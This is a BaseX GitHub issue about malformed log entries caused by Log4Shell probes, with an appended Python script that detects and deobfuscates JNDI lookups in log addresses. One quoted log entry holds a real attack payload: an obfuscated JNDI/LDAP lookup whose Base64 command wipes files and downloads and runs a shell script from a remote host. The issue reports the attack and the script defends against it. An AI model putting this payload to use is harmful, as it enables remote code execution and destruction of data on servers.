BaseXdb / basex

BaseX Main Repository.
http://basex.org
BSD 3-Clause "New" or "Revised" License

Logs: Haywire log entries when attacks take place #2275

Closed ChristianGruen closed 4 months ago

ChristianGruen commented 5 months ago

(Harmless) Log4Shell attacks may lead to undesired log entries (when using Jetty):

<entry
  time="20:26:43.636"
  address="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//141.147.79.97:6583/TomcatBypass/Command/Base64/cm0gLXJmICogOyB3Z2V0IC1PIHN5c3RlbTM2LnNoIGh0dHA6Ly8xNDEuMTQ3Ljc0LjE1L3N5c3RlbTM2LnNoIDsgY3VybCAtbyBzeXN0ZW0zNi5zaCBodHRwOi8vMTQxLjE0Ny43NC4xNS9zeXN0ZW0zNi5zaCA7IGNobW9kICt4IC90bXAvcGFyYWlzby54ODYgOyBjaG1vZCA3Nzcgc3lzdGVtMzYuc2ggOyBzaCBzeXN0ZW0zNi5zaCA7IC4vc3lzdGVtMzYuc2ggOyBybSAtcmYgc3lzdGVtMzYuc2g=}'):54450"
  user="admin"
  type="REQUEST">[GET] /</entry>

Related, questionable requests may lead to NullPointerExceptions:

<entry
  time="19:17:25.492"
  address="91.92.245.67:46348"
  user="admin"
  type="500"
  ms="2.1">Unexpected error: Improper use? Potential bug? Your feedback is welcome: Contact: basex-talk@mailman.uni-konstanz.de Version: BaseX 11.0 beta Java: Eclipse Adoptium, 21.0.1 OS: Linux, amd64 Stack Trace: java.lang.NullPointerException</entry>

ChristianGruen commented 4 months ago

Resolved (785adf76e9eb613b8ae46423484a3ca62f84e078, d527342f8c618e6c3981d56e976896310ef78d40).
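
A triage check for logs containing entries like the two quoted in the issue, as an added example that is not code from BaseX or from the issue's author: it flags `address` values that are not a plain IP:port and undoes the `${x:-y}` default-value obfuscation seen in the first entry so the hidden `jndi:` lookup becomes visible. It assumes entries are rendered with an `address="..."` attribute as shown on this page; the function names and the sample entries (documentation-range addresses, shortened payload) are constructed for illustration.

```python
import ipaddress
import re

# Constructed entries shaped like those in the issue; every address here is
# from a documentation range (RFC 5737), none is a real indicator.
SAMPLE_LOG = """\
<entry time="20:26:43.636" address="t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//192.0.2.10:6583/a}'):54450" user="admin" type="REQUEST">[GET] /</entry>
<entry time="19:17:25.492" address="198.51.100.7:46348" user="admin" type="500" ms="2.1">Unexpected error</entry>
<entry time="19:18:01.010" address="unknown" user="admin" type="REQUEST">[GET] /</entry>
"""

ADDRESS = re.compile(r'address="([^"]*)"')
# ${name:key:-default} resolves to "default"; the entry in the issue uses it
# to spell "jndi:ldap:" piecewise. Other obfuscations are not handled here.
DEFAULTED = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
JNDI = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)

def is_host_port(value):
    """True if value is a literal IP address followed by :port."""
    host, sep, port = value.rpartition(':')
    if not sep or not port.isdecimal() or not 0 < int(port) < 65536:
        return False
    try:
        ipaddress.ip_address(host.strip('[]'))  # brackets: assumed IPv6 form
        return True
    except ValueError:
        return False

def deobfuscate(value):
    """Collapse innermost ${x:-y} to y until nothing changes."""
    previous = None
    while previous != value:
        previous, value = value, DEFAULTED.sub(r'\1', value)
    return value

def classify(line):
    """Return (verdict, normalized address), or None without an address."""
    match = ADDRESS.search(line)
    if not match:
        return None
    address = match.group(1)
    if is_host_port(address):
        return 'ok', address
    plain = deobfuscate(address)
    return ('jndi-lookup' if JNDI.search(plain) else 'malformed'), plain

def scan(text):
    """Classify every line of a log excerpt that carries an address."""
    return [r for r in map(classify, text.splitlines()) if r]
```

Calling `scan(SAMPLE_LOG)` returns one `(verdict, address)` pair per entry, with the first entry's address shown in its deobfuscated form.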